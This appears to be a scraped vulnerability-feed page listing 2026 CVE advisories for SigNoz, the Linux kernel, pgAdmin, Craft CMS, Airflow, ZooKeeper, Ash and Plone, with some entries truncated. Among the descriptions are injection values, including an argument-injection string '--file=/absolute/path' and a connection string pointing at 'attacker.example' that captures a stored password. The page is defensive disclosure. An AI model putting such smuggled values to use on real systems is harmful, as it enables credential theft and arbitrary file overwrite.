SigNoz versions 0.87.0 before 0.142.0 fail to escape user-supplied telemetry field-key names in the v5 query_range API, allowing authenticated users to inject SQL. Attackers with Viewer role or higher can embed backticks and quotes in field names to break out of identifiers and string literals, executing arbitrary ClickHouse SQL to read system tables and exfiltrate data.

Apache Karaf's XmlUtils cached XML parser/transformer factories in static ThreadLocal fields on long-lived container threads. Because a ThreadLocal value outlives the OSGi bundle that created it, repeated bundle or feature install, update, or refresh operations can leave successive bundle ClassLoader's pinned in memory and unreachable for garbage collection, leading to unbounded Metaspace growth and eventual denial of service of the Karaf instance.

In the Linux kernel, the following vulnerability has been resolved: dm-pcache: validate seg_id fields from persistent memory cache_pos_decode(), cache_key_decode() and the last-kset branches of cache_replay(), the writeback worker and the GC worker take a cache segment id from the cache device metadata and index cache->segments[] with it without checking it against cache->n_segs. That metadata is only CRC-protected with a fixed public seed, so whoever supplies the cache device on a table load (CAP_SYS_ADMIN) controls the id; an out-of-range value forms a wild pcache_cache_segment pointer that is dereferenced and written through -- an out-of-bounds read and write driven by on-disk data. Add cache_seg_id_valid() and reject an out-of-range id at each decode site, failing the operation with -EIO instead of indexing past the array. Bound the id against the initialized-segment count (cache_info.n_segs) rather than the physical device total. A forged cache_info.n_segs below seg_num otherwise leaves segments[cache_info.n_segs..seg_num) as zeroed structs whose data pointer is NULL, so a forged id in that window would still be dereferenced. A later patch guarantees cache_info.n_segs <= se

In the Linux kernel, the following vulnerability has been resolved: time/namespace: Validate nanosecond field in proc_timens_set_offset() The function validates tv_sec to be within [-KTIME_SEC_MAX, KTIME_SEC_MAX] but never validates that tv_nsec is within the valid range of [0, NSEC_PER_SEC-1] before using it in timespec64_add(). timespec64_add() expects both timespec64 structures to have normalized values with tv_nsec in the range [0, 999999999]. If off->val.tv_nsec contains invalid values (negative or >= NSEC_PER_SEC), it could lead to incorrect calculations or unexpected behavior. In the Linux kernel, the following vulnerability has been resolved: bpf: Preserve unique-field state across nested structs btf_find_struct_field() initializes a fresh seen mask for every recursive descent. Unique special fields in different levels of the same aggregate therefore do not see one another. The duplicate fields can reach btf_parse_fields(), where they trigger an invariant WARN_ON_ONCE(). A crafted user BTF can consequently trigger the warning before map creation checks capabilities. Initialize the seen mask once in btf_find_field() and pass the same pointer through struct, datasec, and nested-struct walks. This gives the entire field traversal one shared uniqueness state.

In the Linux kernel, the following vulnerability has been resolved: perf: arm_pmuv3: Zero initialize hw_id branch stack field PERF_SAMPLE_BRANCH_HW_INDEX is supported by BRBE so hw_id is passed to userspace, but it's never set by the BRBE driver. Zero initialize it as it should be according to the docs: * For the architectures whose raw branch records are * already stored in age order, the hw_idx should be 0. It's probably too risky to remove PERF_SAMPLE_BRANCH_HW_INDEX from BRBE now in case anyone is setting it and reading the value, but zero initializing the whole struct also protects against the same issue with new fields that are added in the future.

  • Sep 17, 2026In the Linux kernel, the following vulnerability has been resolved: ksmbd: validate ipc response length before dereferencing its fields ipc_validate_msg() comCVE-2026-90170 · Computers, phones & browsers · Linux · reported by 416baaa9-dc9f-4396-8d5f-8c081fb06d67

In the Linux kernel, the following vulnerability has been resolved: ksmbd: validate ipc response length before dereferencing its fields ipc_validate_msg() computes the expected message size by reading length fields out of the response buffer supplied by the userspace ksmbd daemon (payload_sz, session_key_len, ngroups, ...). Those fields are read before the buffer is verified to be large enough to contain the struct they belong to, so a short response makes the read land past the end of the allocation. handle_response() sizes entry->response purely from the netlink attribute length (nla_len()) and only guards the leading handle read, so the daemon can install a response as small as the kmalloc-8 object seen below. When ipc_msg_send_request() then calls ipc_validate_msg() for a KSMBD_EVENT_RPC_REQUEST, the cast to struct ksmbd_rpc_command reads resp->payload_sz at offset 8 of an 8-byte allocation: [ 3697.841381] ================================================================== [ 3697.844099] BUG: KASAN: slab-out-of-bounds in ipc_msg_send_request+0x763/0x800 [ 3697.846604] Read of size 4 at addr ffff888105f95910 by task kworker/4:3/20682 [ 3697.849061] [ 3697.849801] CPU: 4 UID

pgAdmin 4's Backup tool appended the client-supplied 'database' field from the /backup/job/<sid>/object request to the pg_dump argument vector as a bare trailing positional argument, without validation. Because pg_dump parses its options with getopt_long, which permutes arguments, a value beginning with a dash was interpreted as an option rather than as a database name. A value such as --file=/absolute/path therefore overrode the storage-confined --file that pgAdmin had constructed earlier, causing pg_dump to write its output anywhere the pgAdmin process could write, outside the user's File Manager storage directory. This yields arbitrary file creation and overwrite as the operating-system account running pgAdmin, which can destroy pgAdmin's own configuration database and, depending on the target chosen, be escalated further. The same field additionally permitted connection-string injection. libpq expands a database name containing an equals sign into a full connection string, and keywords embedded there override the --host and --port that pgAdmin passes, so a value such as 'host=attacker.example port=5432 dbname=x' redirected pg_dump to a server of the attacker's choosing. • Sep 17, 2026pgAdmin 4's Restore and Maintenance tools passed the client-supplied 'database' field directly as the value of the --dbname option given to pg_restore and psql.CVE-2026-86862 · Other software · pgadmin.org · reported by f86ef6dc-4d3a-42ad-8f28-e6d5547a5007High 7.1

pgAdmin 4's Restore and Maintenance tools passed the client-supplied 'database' field directly as the value of the --dbname option given to pg_restore and psql. libpq expands a database name containing an equals sign into a full connection string, and connection keywords embedded in that value take precedence over the --host and --port arguments that pgAdmin supplies. A value such as 'host=attacker.example port=5432 dbname=x' therefore redirected the utility to a server chosen by the requesting user rather than the server the operation was invoked against. Because pgAdmin exports the decrypted stored database password in the PGPASSWORD environment variable before executing the utility, the redirected connection presents that credential to the attacker-nominated endpoint, which may capture it. The redirection additionally permits outbound connections from the pgAdmin host to arbitrary network addresses, including hosts not otherwise reachable by the requesting user. The behaviour is reachable by any authenticated user holding the tools_restore or tools_maintenance permission, both of which the default User role grants. The Maintenance tool was not affected in the earliest releases,

  • Sep 16, 2026Craft CMS 5.0.0-RC1 through versions before 5.11.0 incorrectly authorize the GraphQL draftCreator and revisionCreator fields: instead of requiring the user-dataCVE-2026-92594 · Other software · craftcms · reported by VulnCheckHigh 8.7

Craft CMS 5.0.0-RC1 through versions before 5.11.0 incorrectly authorize the GraphQL draftCreator and revisionCreator fields: instead of requiring the user-data scope enforced by Gql::canQueryUsers() (usergroups.*:read), these fields are gated only on the elements.drafts:read / elements.revisions:read scopes, and their resolver returns a raw User element whose email, username, fullName, and addresses fields have no per-field authorization. A client holding only the drafts or revisions scope — including an unauthenticated client when the operator has enabled the public GraphQL schema with those scopes — can therefore harvest the email addresses, usernames, full names, and postal addresses of all draft/revision creators (typically site editors and administrators). The issue is fixed in 5.11.0.

Apache Airflow Apache Kafka provider versions 1.15.0 before 2.0.0 resolve dotted-path strings found in a Kafka connection's `extra` field into Python callables via `import_string`, with no allowlist, and hand them to the confluent-kafka client which invokes them. Deployments that have enabled the Kafka event producer — `dag_run_events_enabled` or `task_instance_events_enabled`, both disabled by default — build that client inside the scheduler process, so a user whose only privilege is editing Airflow connections gains arbitrary code execution in the control plane; the Airflow security model limits connection-configuration users to code execution on workers, not the scheduler. Deployments using Google Managed Kafka are not affected, because that code path overwrites any user-supplied `oauth_cb`; plain brokers and Amazon MSK are exposed. Users are recommended to upgrade to apache-airflow-providers-apache-kafka 2.0.0 or later, which adds an allowlist configuration option for connection-string callbacks.

  • Sep 16, 2026When audit logging is enabled (zookeeper.audit.enable=true), an unauthenticated attacker can inject arbitrary fields into Apache ZooKeeper's audit log by sendinCVE-2026-84439 · Websites & servers · Apache Software Foundation · reported by security@apache.orgMedium 5.3

When audit logging is enabled (zookeeper.audit.enable=true), an unauthenticated attacker can inject arbitrary fields into Apache ZooKeeper's audit log by sending a digest authentication request with tab characters (\t) embedded in the username. Because the audit log uses tab-separated key=value format, the injected tabs are parsed as legitimate field separators, allowing the attacker to spoof audit results (e.g., injecting result=success), forge operation types, and corrupt forensic evidence. A log injection vulnerability in Apache ZooKeeper allows a client that can call setACL to inject forged key-value fields into zookeeper_audit.log. When audit logging is enabled, the server serializes attacker-controlled digest ACL ids into the acl= audit field without escaping tab characters. Because audit events are emitted as tab-separated key=value records, a crafted ACL id can make one successful setAcl event appear to contain forged fields such as operation=delete and znode=/forged. This undermines the integrity of downstream audit parsing, alerting, and incident response. This issue affects Apache ZooKeeper: from 3.9.0 through 3.9.5, from 3.8.0 through 3.8.6. Ash field_policies are documented to protect against filter-based information disclosure: when a field the actor may not see is referenced in a filter, it is replaced with an expression that evaluates to nil, so a filter cannot be used as a yes/no oracle to read a value the actor cannot see. This nilling was applied to attributes but not to calculations or aggregates. A user-supplied filter reference to a calculation or aggregate carries an Ash.Query.Calculation / Ash.Query.Aggregate struct, which the authorizer's reference replacement did not match (it only matched the Ash.Resource.* structs), so the filter ran against the real value. As a result, an actor whose field policies forbid a calculation or aggregate can still filter by it (for example filter(secret_calc == "x") or filter(comment_count == n)) and learn the value from whether rows match — an oracle that recovers field-policy-protected values one probe at a time. Filtering is commonly exposed to lower-privileged actors (for example via AshGraphql or AshJsonApi filter arguments), which is exactly the surface field policies are meant to protect. The fix routes filter references to calculations and aggregates through the s

Concrete CMS 9.5.2 and below is vulnerable to stored DOM-based Cross-site Scripting (XSS) via the Gallery block's per-image Caption field because the bundled Magnific Popup lightbox script (concrete/js/features/imagery/frontend.js) re-parses the attribute-decoded caption as HTML through jQuery's .append() in titleSrc instead of inserting it as text. • Sep 15, 2026plone.app.textfield provides a zope.schema-style field type called RichText for storing a value with a related MIME type.CVE-2026-54503 · Other software · plone · reported by GitHubMedium 4.3

plone.app.textfield provides a zope.schema-style field type called RichText for storing a value with a related MIME type. Prior to 2.0.2, 3.0.2, and 4.0.1, depending on the release line, RichTextValue.output returns an unsanitized stored RichText value when mimeType equals outputMimeType, including values that claim the text/x-html-safe output type. This equality shortcut bypasses the safe_html transform even though the transform itself correctly removes event-handler attributes and unsafe URI schemes. Equal types can result from a RichText field configured with the same mimeType and outputMimeType or from REST API input that supplies text/x-html-safe as its content type. The raw stored value is then emitted through tal:content=structure without escaping, allowing a user who can set a RichText field to store JavaScript that executes in a viewer's browser. This issue is fixed in versions 2.0.2, 3.0.2, and 4.0.1.

  • Sep 11, 2026In the Linux kernel, the following vulnerability has been resolved: nfsd: widen nfsd_genl_rqstp address fields to sockaddr_storage struct nfsd_genl_rqstp declCVE-2026-89698 · Computers, phones & browsers · Linux · reported by 416baaa9-dc9f-4396-8d5f-8c081fb06d67

In the Linux kernel, the following vulnerability has been resolved: nfsd: widen nfsd_genl_rqstp address fields to sockaddr_storage struct nfsd_genl_rqstp declares rq_daddr and rq_saddr as plain "struct sockaddr" (16 bytes). When an IPv6 NFS client is connected, nfsd_genl_rpc_status_compose_msg() casts these fields to "struct sockaddr_in6 *" (28 bytes) and reads sin6_addr at offset 8..24, which extends 8 bytes past the end of the 16-byte sockaddr field into the adjacent rq_flags member. The 16-byte nla_put_in6_addr then ships 8 bytes of truncated IPv6 address followed by 8 bytes of rq_flags to userspace via the NFSD_A_RPC_STATUS_SADDR6/DADDR6 netlink attributes. This is reachable by any unprivileged process in the network namespace because NFSD_CMD_RPC_STATUS_GET uses GENL_CMD_CAP_DUMP without GENL_ADMIN_PERM. Fix by widening rq_daddr and rq_saddr to struct sockaddr_storage so the IPv6 casts operate within bounds, copying sizeof(struct sockaddr_storage) bytes in the memcpy calls so the full address is captured, and zero-initializing the genl_rqstp stack variable to prevent leaking uninitialized tail bytes through netlink.
